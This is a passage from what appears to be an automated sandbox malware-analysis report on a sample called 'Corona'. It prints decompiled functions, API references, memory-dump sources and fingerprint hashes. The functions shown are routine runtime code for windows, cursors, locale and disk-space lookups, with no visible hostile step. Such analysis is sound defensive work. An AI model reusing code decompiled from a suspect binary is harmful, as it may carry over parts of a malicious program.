                                  • GetSystemMetrics.USER32 ref: 00423949
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: MonitorFromRect$8B
                                  • API String ID: 1792783759-3728447208
                                  • Opcode ID: 1f2cd9ad4c6d57b119639a008c8fccd411056af884c1bd36cb935d3e9bfb11bc
                                  • Instruction ID: 161ab9d895ccde48d9710f5918d133d8779ce8cfd105203c0021783ce7830bb2
                                  • Opcode Fuzzy Hash: 1f2cd9ad4c6d57b119639a008c8fccd411056af884c1bd36cb935d3e9bfb11bc
                                  • Instruction Fuzzy Hash: 5B012CB57002299FEB109F55F985B66BB74E747397F848067E9049A302C2FCDDC48BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004366CC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004366CC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x436944
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x436944
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x436944
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                  0x004366d4
                                  0x004366d6
                                  0x004366d6
                                  0x004366d9
                                  0x004366dc
                                  0x004366df
                                  0x004366e4
                                  0x004366ee
                                  0x004366f3
                                  0x004366f9
                                  0x004366fe
                                  0x00436701
                                  0x00436709

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ClientRectScreenWindow
                                  • String ID: DiC$DiC
                                  • API String ID: 3371951266-514404270
                                  • Opcode ID: 0faa47d8d30c0205b1855967f5f1500c71ecfb9b3eef3408c9d333563e6a0c01
                                  • Instruction ID: 8eb09ce6ed2c4160a7baa381af755d6850ede66a152c56aca62fb38e4b447501
                                  • Opcode Fuzzy Hash: 0faa47d8d30c0205b1855967f5f1500c71ecfb9b3eef3408c9d333563e6a0c01
                                  • Instruction Fuzzy Hash: 8FF0A2B190420DAFCB00DFE9C9818DEFBFCEB08210F10456AA955E3341D631AA508BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C6B0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040C6B0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x450130 = _t1;
				}
				if( *0x450130 == 0) {
					 *0x450130 = E004081FC;
					return E004081FC;
				}
				return _t1;
			}





                                  0x0040c6b6
                                  0x0040c6bb
                                  0x0040c6bf
                                  0x0040c6c7
                                  0x0040c6cc
                                  0x0040c6cc
                                  0x0040c6d8
                                  0x0040c6df
                                  0x00000000
                                  0x0040c6df
                                  0x0040c6e5

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040D119,00000000,0040D12C), ref: 0040C6B6
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040C6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 00c90e06f0698e43cc24e66a46213d66158d7cdafda0f5d1fcb4f00283f85d37
                                  • Instruction ID: 9657a0c6f71de8a4917827327cc38b0922dddad60181b76ab3d0a6f2693937d7
                                  • Opcode Fuzzy Hash: 00c90e06f0698e43cc24e66a46213d66158d7cdafda0f5d1fcb4f00283f85d37
                                  • Instruction Fuzzy Hash: 8DD05EB0650B45CADF219BB59CD161A3194A714306F102A3B6480BA2D3CBBECC00DA1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042C704, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0042C704(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x452b4c != 0) {
					L3:
					_t49 =  *0x452b2c; // 0x0
					_t50 =  *0x452b2c; // 0x0
					_t117 = E0042C5E4(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x452b4c == 0) {
						_t168 =  *0x452b50;
						if( *0x452b50 != 0) {
							_t106 =  *0x452b40; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x452b50; // 0x0
							E00436838(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x452b2c; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x452b4c;
						_t6 =  &_v24;
						 *_t6 =  *0x452b4c != 0;
						__eflags =  *_t6;
						 *0x452b4c = 2;
					} else {
						 *0x452b4c = 1;
						_v24 = 0;
					}
					_t54 =  *0x452b30; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x452b30; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x452b30; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x452b30; // 0x0
							E0042E338( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x452b30; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E0042C634(2);
						_t121 =  *_t155;
						_t60 =  *0x452b30; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x452b50 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x452b50; // 0x0
								E00436820(_t82, _t158);
								_t84 =  *0x452b50; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x452b50; // 0x0
									E00436920(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x452b50; // 0x0
									E00436838(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x452b50; // 0x0
								E00436994(_t91, _t131, __eflags);
								_t93 =  *0x451104; // 0x452bb4
								SetCursor(E0044BCE8( *_t93, _t158));
							}
						}
						_t62 =  *0x451104; // 0x452bb4
						_t65 = SetCursor(E0044BCE8( *_t62, _t158));
						if( *0x452b4c != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E0042C670(_t121);
								_t67 =  *0x452b30; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0042E338(_t118,  &_v24, _t155);
									_t65 = E004032F8(_t118, __eflags);
									_t135 =  *0x452b30; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x452b30; // 0x0
									_t65 = E004032F8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x452b30; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x452b30; // 0x0
								_t65 = E004032F8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x452b30 == 0) {
								goto L32;
							} else {
								_t119 =  *0x452b30; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E004079CC(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x452b30; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x452b30; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x452b30; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E0042C634(1);
					if( *0x452b30 == 0) {
						goto L32;
					}
					_t102 =  *0x452b30; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x452b30; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x452b30; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E0042C634(0);
					if( *0x452b30 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x452b3c; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x452b48; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x452b40; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x452b48; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                  0x0042c70a
                                  0x0042c713
                                  0x0042c742
                                  0x0042c742
                                  0x0042c748
                                  0x0042c75e
                                  0x0042c767
                                  0x0042c769
                                  0x0042c770
                                  0x0042c772
                                  0x0042c778
                                  0x0042c785
                                  0x0042c78a
                                  0x0042c78a
                                  0x0042c770
                                  0x0042c78f
                                  0x0042c79b
                                  0x0042c7ab
                                  0x0042c7b2
                                  0x0042c7b2
                                  0x0042c7b2
                                  0x0042c7b7
                                  0x0042c79d
                                  0x0042c79d
                                  0x0042c7a4
                                  0x0042c7a4
                                  0x0042c7be
                                  0x0042c7c6
                                  0x0042c813
                                  0x0042c813
                                  0x0042c81a
                                  0x0042c820
                                  0x0042c823
                                  0x0042c82c
                                  0x0042c834
                                  0x0042c83c
                                  0x0042c841
                                  0x0042c84a
                                  0x0042c851
                                  0x0042c851
                                  0x0042c85f
                                  0x0042c861
                                  0x0042c863
                                  0x0042c86d
                                  0x0042c876
                                  0x0042c87a
                                  0x0042c884
                                  0x0042c889
                                  0x0042c88e
                                  0x0042c893
                                  0x0042c897
                                  0x0042c8b2
                                  0x0042c8b7
                                  0x0042c8bc
                                  0x0042c899
                                  0x0042c89d
                                  0x0042c8a4
                                  0x0042c8a6
                                  0x0042c8ab
                                  0x0042c8ab
                                  0x0042c8c3
                                  0x0042c8c3
                                  0x0042c8c8
                                  0x0042c8d0
                                  0x0042c8dd
                                  0x0042c8dd
                                  0x0042c87a
                                  0x0042c8e5
                                  0x0042c8f2
                                  0x0042c8fe
                                  0x0042c9d1
                                  0x0042c9d1
                                  0x0042c904
                                  0x0042c904
                                  0x0042c906
                                  0x0042c927
                                  0x0042c929
                                  0x0042c92e
                                  0x0042c931
                                  0x0042c933
                                  0x0042c961
                                  0x0042c970
                                  0x0042c975
                                  0x0042c97b
                                  0x0042c935
                                  0x0042c93d
                                  0x0042c949
                                  0x0042c94e
                                  0x0042c954
                                  0x0042c954
                                  0x0042c908
                                  0x0042c90b
                                  0x0042c90e
                                  0x0042c91b
                                  0x0042c91b
                                  0x0042c985
                                  0x00000000
                                  0x0042c987
                                  0x0042c987
                                  0x0042c98d
                                  0x0042c990
                                  0x0042c998
                                  0x0042c99f
                                  0x00000000
                                  0x00000000
                                  0x0042c9a6
                                  0x0042c9a8
                                  0x0042c9af
                                  0x0042c9af
                                  0x0042c9b2
                                  0x0042c9b9
                                  0x0042c9bc
                                  0x0042c9c7
                                  0x0042c9c8
                                  0x0042c9c9
                                  0x0042c9ca
                                  0x00000000
                                  0x0042c9ca
                                  0x0042c985
                                  0x0042c8fe
                                  0x0042c7ca
                                  0x0042c7d6
                                  0x00000000
                                  0x00000000
                                  0x0042c7dc
                                  0x0042c7e1
                                  0x0042c7e4
                                  0x0042c7ec
                                  0x0042c7ef
                                  0x0042c7f6
                                  0x0042c7fc
                                  0x0042c801
                                  0x0042c80d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042c80d
                                  0x0042c715
                                  0x0042c71c
                                  0x0042c721
                                  0x0042c727
                                  0x00000000
                                  0x00000000
                                  0x0042c729
                                  0x0042c731
                                  0x0042c734
                                  0x0042c736
                                  0x0042c73c
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0042C778
                                  • GetDesktopWindow.USER32 ref: 0042C89D
                                  • SetCursor.USER32(00000000), ref: 0042C8F2
                                    • Part of subcall function 00436994: 73451770.COMCTL32(00000000,?,0042C8CD), ref: 004369B0
                                    • Part of subcall function 00436994: ShowCursor.USER32(000000FF,00000000,?,0042C8CD), ref: 004369CB
                                  • SetCursor.USER32(00000000), ref: 0042C8DD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Cursor$DesktopWindow$73451770Show
                                  • String ID:
                                  • API String ID: 3513720257-0
                                  • Opcode ID: 1dcfd6b92667e6187864cec8dbfdd658c3bac7b9e5933bbe4ac15449e969a89b
                                  • Instruction ID: 5b5aaf0a81d5917144a57d9995636050d907c1f276da4fb83b6be688eae297a0
                                  • Opcode Fuzzy Hash: 1dcfd6b92667e6187864cec8dbfdd658c3bac7b9e5933bbe4ac15449e969a89b
                                  • Instruction Fuzzy Hash: 10915DB87013518FC704DF29E9D4A1AB7E1BF5A305F54896BE8448B362C7B8EC45CB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E4D4, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040E4D4(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040E3A0(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040D5B0();
							E0040E3A0(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040D5B8();
							E0040E3A0(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040E478(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040E448(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040D5C0();
						E0040E3A0(_v780);
						E0040E6CC(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040D14C();
				return E0040E3A0(_v776);
			}






















                                  0x0040e4e0
                                  0x0040e4f0
                                  0x0040e4f7
                                  0x0040e4f7
                                  0x0040e502
                                  0x0040e510
                                  0x0040e51f
                                  0x0040e53d
                                  0x0040e521
                                  0x0040e52c
                                  0x0040e52c
                                  0x0040e54c
                                  0x0040e558
                                  0x0040e55b
                                  0x0040e55d
                                  0x0040e55e
                                  0x0040e560
                                  0x0040e566
                                  0x0040e568
                                  0x0040e577
                                  0x0040e578
                                  0x0040e582
                                  0x0040e583
                                  0x0040e588
                                  0x0040e593
                                  0x0040e594
                                  0x0040e59e
                                  0x0040e59f
                                  0x0040e5a4
                                  0x0040e5bf
                                  0x0040e5c1
                                  0x0040e5c2
                                  0x0040e5c5
                                  0x0040e5c5
                                  0x0040e566
                                  0x0040e5ce
                                  0x0040e5d1
                                  0x0040e5d3
                                  0x0040e5d4
                                  0x0040e5da
                                  0x0040e5e0
                                  0x0040e5e2
                                  0x0040e5e4
                                  0x0040e5e7
                                  0x0040e5ea
                                  0x0040e5ea
                                  0x0040e5ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e5ed
                                  0x0040e5ed
                                  0x0040e5f4
                                  0x0040e5ff
                                  0x0040e607
                                  0x0040e60e
                                  0x0040e615
                                  0x0040e616
                                  0x0040e61b
                                  0x0040e626
                                  0x0040e626
                                  0x0040e634
                                  0x0040e638
                                  0x0040e63e
                                  0x0040e63f
                                  0x0040e64f

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E583
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E59F
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E616
                                  • VariantClear.OLEAUT32(?), ref: 0040E63F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction ID: 9c05e375641b2ad9a7839fbb3c3f335dd74d15101c693efd1f9985299317d2ad
                                  • Opcode Fuzzy Hash: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction Fuzzy Hash: D14132759012199FCB65DB5ACC90BC9B3BCAF48308F4049EAE549B7352D638AF908F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C0D4, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040C0D4() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x452740 = 0x409;
				 *0x452744 = 9;
				 *0x452748 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x452740 = _t14;
				}
				if(_t14 != 0) {
					 *0x452744 = _t14 & 0x3ff;
					 *0x452748 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x45010c, 0x40c228, 8 << 2);
				if( *0x4500c4 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x45274d = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x45274c = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040C05C(__eflags, _t49);
					}
				} else {
					_t20 = E0040C0BC();
					if(_t20 != 0) {
						 *0x45274d = 0;
						 *0x45274c = 0;
						return _t20;
					}
					E0040C05C(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C3C(0x45010c, 0x20, 0x40c228);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x45274c = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x45274d = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x452740; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x45274d = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                  0x0040c0e0
                                  0x0040c0ea
                                  0x0040c0f4
                                  0x0040c0fe
                                  0x0040c105
                                  0x0040c107
                                  0x0040c107
                                  0x0040c10f
                                  0x0040c11b
                                  0x0040c127
                                  0x0040c127
                                  0x0040c13b
                                  0x0040c144
                                  0x0040c1f3
                                  0x0040c1f8
                                  0x0040c1fd
                                  0x0040c204
                                  0x0040c209
                                  0x0040c20b
                                  0x0040c20e
                                  0x0040c214
                                  0x0040c216
                                  0x00000000
                                  0x0040c21e
                                  0x0040c14a
                                  0x0040c14a
                                  0x0040c151
                                  0x0040c153
                                  0x0040c15a
                                  0x00000000
                                  0x0040c15a
                                  0x0040c167
                                  0x0040c177
                                  0x0040c179
                                  0x0040c17e
                                  0x0040c181
                                  0x0040c187
                                  0x0040c189
                                  0x0040c18b
                                  0x00000000
                                  0x0040c18b
                                  0x0040c197
                                  0x0040c19c
                                  0x0040c1a2
                                  0x0040c1a2
                                  0x0040c1a4
                                  0x0040c1a5
                                  0x0040c1a6
                                  0x0040c1a6
                                  0x0040c1c2
                                  0x0040c1c8
                                  0x0040c1cd
                                  0x0040c1d2
                                  0x0040c1d8
                                  0x0040c1d8
                                  0x0040c1dc
                                  0x0040c1df
                                  0x0040c1e5
                                  0x0040c1e7
                                  0x00000000
                                  0x00000000
                                  0x0040c1e9
                                  0x0040c1ec
                                  0x0040c1ec
                                  0x0040c1ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040c1ed
                                  0x0040c1d8
                                  0x0040c225
                                  0x0040c225
                                  0x00000000

                                  APIs
                                  • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040C1C8
                                  • GetThreadLocale.KERNEL32 ref: 0040C0FE
                                    • Part of subcall function 0040C05C: GetCPInfo.KERNEL32(00000000,?), ref: 0040C075
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: InfoLocaleStringThreadType
                                  • String ID:
                                  • API String ID: 1505017576-0
                                  • Opcode ID: 996493099b2d17bd7cf62bbf6f162730e13c43baf57e3538e89db00878c7ad9d
                                  • Instruction ID: 4ccc2df17dbcb55e0bb393dd6276ecd99a585616cffa480c7b62add919e6e963
                                  • Opcode Fuzzy Hash: 996493099b2d17bd7cf62bbf6f162730e13c43baf57e3538e89db00878c7ad9d
                                  • Instruction Fuzzy Hash: E5317831540344CAE320D7A1AE813573794E757306F0442BBE984AF3E3D6BC8945CBAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00420500, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00420500(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041D010(_v8);
					_push(_t84);
					_push(0x4205df);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0042181C( *((intOrPtr*)(_v8 + 0x58)));
